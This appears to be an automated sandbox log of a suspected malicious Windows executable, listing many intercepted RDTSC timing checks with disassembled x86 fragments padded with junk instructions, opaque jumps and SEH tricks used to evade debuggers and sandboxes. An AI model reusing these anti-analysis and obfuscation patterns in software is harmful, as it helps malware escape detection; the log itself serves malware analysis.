Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B42F second address: 102B47F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007FC85D338E26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f or dword ptr [ebp+122D2612h], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC85D338E28h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D319Ch] 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FC85D338E2Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102BEE6 second address: 102BEF3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC85CDF02A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F165 second address: 102F177 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FC85D338E26h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F771 second address: 102F79B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC85CDF02A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC85CDF02B9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F79B second address: 102F79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F79F second address: 102F7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F7A5 second address: 102F82D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC85D338E28h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movsx edi, cx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007FC85D338E28h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 jmp 00007FC85D338E2Eh 0x00000048 push 00000000h 0x0000004a mov edi, 24257E26h 0x0000004f xchg eax, esi 0x00000050 jo 00007FC85D338E34h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F82D second address: 102F833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103083C second address: 1030845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030845 second address: 1030849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1037E99 second address: 1037EC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC85D338E37h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC85D338E2Fh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE69F7 second address: FE6A17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FC85CDF02A6h 0x00000009 jne 00007FC85CDF02A6h 0x0000000f pop esi 0x00000010 push edx 0x00000011 jmp 00007FC85CDF02ADh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102FAA8 second address: 102FAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309D6 second address: 10309DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102FAAC second address: 102FADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC85D338E35h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1036179 second address: 1036187 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FC85CDF02A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1038653 second address: 103865D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC85D338E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309DC second address: 10309E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1036187 second address: 103618B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039600 second address: 1039621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC85CDF02B0h 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FC85CDF02B0h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309E1 second address: 10309EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC85D338E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039621 second address: 10396BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor bl, FFFFFFB4h 0x0000000a push ecx 0x0000000b mov ebx, dword ptr [ebp+122D3707h] 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, 43F12AF0h 0x0000001e sub dword ptr [ebp+122D2D40h], ecx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC85CDF02A8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov eax, dword ptr [ebp+122D0BB1h] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FC85CDF02A8h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D3368h], eax 0x0000006b mov ebx, dword ptr [ebp+122D3483h] 0x00000071 push FFFFFFFFh 0x00000073 mov dword ptr [ebp+122D2A2Bh], esi 0x00000079 nop 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jng 00007FC85CDF02A6h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B7FC second address: 103B800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309EB second address: 1030A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124679D8h], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jnl 00007FC85CDF02BEh 0x00000021 jmp 00007FC85CDF02B8h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FC85CDF02A8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov ebx, eax 0x00000049 mov eax, dword ptr [ebp+122D031Dh] 0x0000004f add dword ptr [ebp+122D25E5h], ebx 0x00000055 push FFFFFFFFh 0x00000057 mov dword ptr [ebp+12451768h], esi 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B800 second address: 103B822 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d pushad 0x0000000e jmp 00007FC85D338E32h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030A71 second address: 1030A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1042C23 second address: 1042C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103EA86 second address: 103EA8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103FC1A second address: 103FC33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103FC33 second address: 103FC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1042E71 second address: 1042E80 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1042E80 second address: 1042E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10499F1 second address: 10499F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10499F5 second address: 10499F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104F33F second address: 104F34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC85D338E26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104F4AB second address: 104F4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jng 00007FC85CDF02B0h 0x00000010 pushad 0x00000011 je 00007FC85CDF02A6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC85CDF02B8h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104F4E2 second address: 104F4EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104F4EC second address: 104F4FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC85CDF02A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1054D1B second address: 1054D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1054D1F second address: 1054D3B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC85CDF02B6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1054D3B second address: 1054D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055366 second address: 105536C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10554E8 second address: 1055528 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC85D338E3Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jp 00007FC85D338E26h 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007FC85D338E26h 0x00000022 jo 00007FC85D338E26h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055528 second address: 105552C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105552C second address: 1055534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1055534 second address: 105553B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10556A4 second address: 10556A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1058C6C second address: 1058C82 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC85CDF02A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FC85CDF02ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1058C82 second address: 1058C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1058C86 second address: 1058C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1058C8C second address: 1058C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D1B6 second address: 105D1BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D1BC second address: 105D1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC85D338E3Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC85D338E36h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D1E6 second address: 105D1EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D1EC second address: 105D1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D1F9 second address: 105D217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC85CDF02AFh 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FC85CDF02A6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1024BD9 second address: 1024BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1024BDE second address: 1024C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a lea eax, dword ptr [ebp+12483953h] 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FC85CDF02A8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a sub dword ptr [ebp+122D2950h], eax 0x00000030 jmp 00007FC85CDF02B7h 0x00000035 nop 0x00000036 pushad 0x00000037 jmp 00007FC85CDF02B7h 0x0000003c push eax 0x0000003d push edx 0x0000003e push esi 0x0000003f pop esi 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10252C7 second address: 102537B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC85D338E39h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC85D338E2Eh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jl 00007FC85D338E30h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 push esi 0x00000024 push edi 0x00000025 pop edi 0x00000026 pop esi 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d push edi 0x0000002e push edi 0x0000002f pop edi 0x00000030 pop edi 0x00000031 jl 00007FC85D338E28h 0x00000037 popad 0x00000038 pop eax 0x00000039 mov edi, dword ptr [ebp+122D3747h] 0x0000003f jmp 00007FC85D338E33h 0x00000044 call 00007FC85D338E29h 0x00000049 jmp 00007FC85D338E37h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FC85D338E36h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102537B second address: 1025380 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025380 second address: 10253A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FC85D338E38h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10253A9 second address: 10253BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FC85CDF02A8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025834 second address: 1025839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025C33 second address: 1025C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025C37 second address: 1025C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025C3D second address: 1025C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025FBC second address: 1025FC2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025FC2 second address: 1025FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85CDF02ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105C695 second address: 105C6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC85D338E2Dh 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105C6AB second address: 105C6BB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC85CDF02A6h 0x00000008 jng 00007FC85CDF02A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105C6BB second address: 105C6C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC85D338E2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105C6C5 second address: 105C6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC85CDF02B3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105C86A second address: 105C87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC85D338E2Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105C87B second address: 105C898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FC85CDF02B7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106174A second address: 1061790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85D338E2Eh 0x00000009 jo 00007FC85D338E26h 0x0000000f popad 0x00000010 pop edi 0x00000011 push edx 0x00000012 jmp 00007FC85D338E38h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC85D338E31h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1061A43 second address: 1061A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1061A47 second address: 1061A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1062006 second address: 1062012 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1062012 second address: 1062016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1062016 second address: 106202D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1067054 second address: 106705F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106705F second address: 1067064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1067064 second address: 1067089 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E28h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC85D338E35h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1977 second address: FE198A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
